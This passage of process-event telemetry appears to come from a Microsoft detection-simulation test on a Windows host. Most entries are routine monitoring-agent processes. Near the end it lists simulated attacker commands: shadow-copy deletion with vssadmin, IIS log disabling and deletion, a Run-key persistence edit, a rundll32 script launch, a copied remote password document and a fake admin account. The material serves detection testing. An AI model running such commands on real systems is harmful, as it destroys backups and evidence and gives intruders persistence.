\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\"],\"CommandLine\":[\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\".\\\\reg not /domain:everything that /sid:shines is /krbtgt:golden !\",\"cmd /c \\\"systeminfo && systeminfo\\\"\",\".\\\\rundll32 /C 42424.exe\",\"42424.exe\",\".\\\\rundll32 /C c:\\\\users\\\\MSTICAdmin\\\\42424.exe\",\".\\\\rundll32 /C 1234.exe\",\"1234.exe\",\".\\\\rundll32 /C c:\\\\users\\\\MSTICAdmin\\\\1234.exe\",\".\\\\rundll32 /C reg.exe\",\"reg.exe\",\".\\\\reg.exe add \\\\hkcu\\\\software\\\\microsoft\\\\some\\\\key\\\\Run /v abadvalue\",\"c:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe C:\\\\Users\\\\MSTICAdmin\\\\AppData\\\\Local\\\\Temp\\\\2\\\\is-01DD7.tmp\\\\tsetup.1.0.14.tmp\\\" /SL5=\\\"$250276,19992586,423424,C:\\\\Users\\\\MSTICAdmin\\\\Downloads\\\\tsetup.1.0.14.exe\",\".\\\\rundll32.exe /C mshtml,RunHTMLApplication javascript:alert(tada!)\",\".\\\\netsh.exe \\\"in (*.exe) do start # artificial commandline solely for purposes of triggering test\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell Set-ExecutionPolicy RemoteSigned&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell Enable-WSManCredSSP =2013Role Server -force&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell winrm set winrm/config/service/Auth @{Kerberos=003D\\\"true\\\"}&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\ProgramData\\\"© \\\\\\\\[REDACTED]\\\\c$\\\\users\\\\[REDACTED]\\\\Documents\\\\\\\"Password Change Dates.docx\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\system32\\\\inetsrv\\\\appcmd set config \\\"Default Web Site/\\\" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&del C:\\\\inetpub\\\\logs\\\\logFiles\\\\W3SVC1\\\\*.log /q&echo [S]&cd&echo [E]\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat \",\"c:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe \",\"vssadmin delete shadows /all /quiet\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\system32\\\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}\",\"cmd.exe /c c:\\\\Diagnostics\\\\WindowsSimulateDetections.bat c:\\\\Diagnostics\\\\UserTmp\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft.com; dotanp@microsoft.com; liengli@microsoft.com\",\"net user adm1nistrator Bob_testing /add\",\"C:\\\\Windows\\\\system32\\\\net1 user adm1nistrator Bob_testing /add\",\"net share TestShare=c:\\\\testshare /Grant:Users,Read\",\"C:\\\\Windows\\\\system32\\\\net1 share TestShare=c:\\\\testshare /Grant:Users,Read\",\"dism /online /enable-feature /featurename:File-Services /NoRestart\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"net use q: \\\\\\\\MSTICAlertsWin1\\\\TestShare Bob_testing /User:adm1nistrator\",\"C:\\\\Windows\\\\TEMP\\\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\\\dismhost.exe {D57BA872-53C0-424D-80AE-E49112D1CF04}\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\winsxs\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\TiWorker.exe -Embedding\",\"net use q: /delete\",\"net share TestShare /delete\",\"C:\\\\Windows\\\\system32\\\\net1 share TestShare /delete\",\"net user adm1nistrator /delete\",\"C:\\\\Windows\\\\system32\\\\net1 user adm1nistrator 